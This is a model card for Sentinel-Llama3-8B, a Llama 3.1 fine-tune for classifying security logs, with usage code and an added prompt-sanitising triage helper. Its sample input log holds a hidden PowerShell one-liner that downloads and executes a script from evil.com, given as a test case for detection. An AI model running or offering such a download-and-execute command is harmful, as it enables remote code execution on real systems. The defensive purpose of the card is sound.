πŸ›‘οΈ Sentinel-Llama3-8B: AI for Cybersecurity Log Analysis


📖 Model Description

Sentinel-Llama3-8B is a specialized Large Language Model (LLM) fine-tuned for Cybersecurity Operations. Built upon the powerful Meta Llama 3.1 8B Instruct architecture, this model has been trained on a diverse dataset of system logs, PowerShell commands, and process execution traces to detect and classify security threats.

This model is designed to assist Blue Teams and SOC Analysts in automating the initial triage of system logs, reducing alert fatigue, and identifying malicious activities with high precision.

🔑 Key Capabilities

  • Benign vs. Malicious Classification: Accurately distinguishes between normal system administration tasks and potential threats.
  • Threat Categorization: Can classify activities into specific MITRE ATT&CK categories, including:
    • Command and Control (C2)
    • Defense Evasion
    • Ransomware Activity
    • Suspicious Execution
    • Credential Access
  • Low False Positive Rate: Optimized to minimize false alarms on legitimate administrative commands (benign logs).

📊 Performance

  • Accuracy: ~82% (on internal test set).
  • Precision (Benign): ~95% (High reliability for filtering safe logs).
  • Recall (Benign): ~98%.

🚀 How to Use

You can run this model locally using the unsloth library (recommended for speed) or standard transformers.

Using Unsloth (Fastest Inference)

from unsloth import FastLanguageModel

# 1. Load Model
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = "Duong2006/sentinel-llama3-8b",
    max_seq_length = 2048,
    dtype = None,
    load_in_4bit = True,
)
FastLanguageModel.for_inference(model)

# 2. Define Prompt Template
alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

# 3. Predict
instruction = "Analyze the following system log event and classify the activity."
input_log = "Process Name: powershell.exe\nCommand Line: powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/malware.ps1')\nUser: DOMAIN\\Admin"

# Leave the response slot empty so the model generates it (requires a CUDA GPU)
inputs = tokenizer(
    [alpaca_prompt.format(instruction, input_log, "")],
    return_tensors = "pt",
).to("cuda")

outputs = model.generate(**inputs, max_new_tokens = 64, use_cache = True)
print(tokenizer.batch_decode(outputs)[0])
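
In a triage pipeline the decoded text still contains the whole prompt, and the log fields placed into it are untrusted input. The following is an added example, not part of the model card or the author's code: it neutralises template markers inside log text and maps the generated answer to exactly one label, sending anything ambiguous to an analyst. The label strings, the `NEEDS_REVIEW` value and the helper names are assumptions, since the model's exact output format is not documented here.

```python
import re

# Same Alpaca-style template as the usage code above.
ALPACA_PROMPT = (
    "Below is an instruction that describes a task, paired with an input that "
    "provides further context. Write a response that appropriately completes "
    "the request.\n\n### Instruction:\n{}\n\n### Input:\n{}\n\n### Response:\n{}"
)
RESPONSE_MARKER = "### Response:"
# Labels from the capability list; exact output strings are an assumption,
# so matching below is a case-insensitive substring search.
LABELS = ["Benign", "Command and Control", "Defense Evasion",
          "Ransomware Activity", "Suspicious Execution", "Credential Access"]
# Llama 3 style special tokens such as <|eot_id|> left in decoded output.
SPECIAL_TOKENS = re.compile(r"<\|[^|>]*\|>")


def sanitize_log(raw: str) -> str:
    """Neutralise '###' runs so log text cannot pose as a template section."""
    return re.sub(r"#{3,}", "[#]", raw)


def build_prompt(instruction: str, raw_log: str) -> str:
    """Fill the template with a sanitised log and an empty response slot."""
    return ALPACA_PROMPT.format(instruction, sanitize_log(raw_log), "")


def extract_response(decoded: str) -> str:
    """Return only the generated text after the template's response marker."""
    _, marker, tail = decoded.partition(RESPONSE_MARKER)
    return SPECIAL_TOKENS.sub("", tail).strip() if marker else ""


def triage(decoded: str) -> str:
    """Map output to exactly one label; anything else goes to an analyst."""
    answer = extract_response(decoded).lower()
    hits = [label for label in LABELS if label.lower() in answer]
    return hits[0] if len(hits) == 1 else "NEEDS_REVIEW"
```

Pass `build_prompt(instruction, input_log)` to the tokenizer in place of the raw `alpaca_prompt.format(...)` call, then run `triage()` on the decoded output.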